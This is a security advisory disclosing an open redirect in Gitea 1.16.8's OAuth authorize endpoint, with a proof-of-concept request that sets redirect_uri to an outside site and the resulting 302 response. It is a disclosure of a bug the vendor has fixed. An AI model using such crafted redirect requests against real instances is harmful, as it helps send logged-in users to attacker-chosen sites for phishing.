usd-2022-0023 | Open Redirect in Gitea
Advisory ID: usd-2022-0023
Product: Gitea Affected Version: 1.16.8
Vulnerability Type: https://cwe.mitre.org/data/definitions/601.html
Security Risk: Medium
Vendor URL: https://gitea.io/
Vendor Status: Fixed
Advisory Status: Closed
CVE number: Not requested yet
CVE Link: Not requested yet
First Published: Not published yet
Last Update: 2022-06-30
Description
Gitea implements OAuth. However if the response_type=code and client_secret parameter are not set in the request, the application redirects the user to the value provided within the redirect_uri parameter.
You need to have a valid client_id to make this working. You can configure one in your account. The victim needs to be authenticated, otherwise the victim will be redirected to the login page and will be redirected to the page after login.
Proof of Concept
Exemplary request:
GET /login/oauth/authorize?client_id=5445d361-XXXf&redirect_uri=https://usd.de HTTP/1.1
Host: localhost:3000
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
Cookie: XXX
Connection: close
Corresponding response:
HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Location: https://usd.de?error=unsupported_response_type&error_description=Only+code+response+type+is+supported.&state=
Set-Cookie: _csrf=s[...]; Path=/; Expires=Tue, 21 Jun 2022 14:34:58 GMT; HttpOnly; SameSite=Lax
Set-Cookie: macaron_flash=; Path=/; Max-Age=0; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
Date: Mon, 20 Jun 2022 14:34:58 GMT
Content-Length: 140
Connection: close <a href="https://usd.de?error=unsupported_response_type&error_description=Only+code+response+type+is+supported.&state=">Found</a>.
Fix
The OAuth implementation should follow the "OAuth 2.0 Security Best Current Practice"
References
- https://datatracker.ietf.org/doc/html/draft-ietf-oauth-security-topics#section-4.10.2
- https://cwe.mitre.org/data/definitions/601.html
Timeline
- 2022-06-22: Vulnerability identified by Christian Pöschl
- 2022-06-22: First contact request
- 2022-07-01: Investigation started by vendor
- 2022-07-15: Vendor confirms remediation
Credits
This security vulnerability was identified by Christian Pöschl of usd AG.